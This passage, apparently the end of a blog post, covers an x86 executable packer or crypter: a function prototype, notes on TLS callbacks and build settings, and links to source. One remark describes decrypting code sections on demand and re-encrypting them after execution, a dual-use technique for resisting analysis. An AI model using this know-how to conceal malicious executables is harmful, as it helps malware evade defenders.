unsigned int swap_endianess(unsigned int value);

A few general remarks about the code:

  • Programs utilizing TLS callbacks may or may not work properly (depending on what the callbacks do). Full support for TLS callbacks can be implemented without issue
  • An interesting idea would be to decrypt sections or pages as needed. This could be done by setting memory breakpoints on the sections or on individual pages. The instructions can be encrypted again afterwards once they’ve executed. This requires quite a bit of work in implementing a SEH handler in assembly and registering the exception in the processes exception list.
  • This code only works on x86 executables. This is extremely obvious and not much can be done in that regard.
  • The source needs to be built in release mode with any sort of extra optimizations/security (ESP checking/security cookies) disabled.

The source code and compiled sample can be found here
A Visual Studio 2010 project can be found here
A downloadable PDF of this post can be found here

« Newer PostsOlder Posts »

Powered by WordPress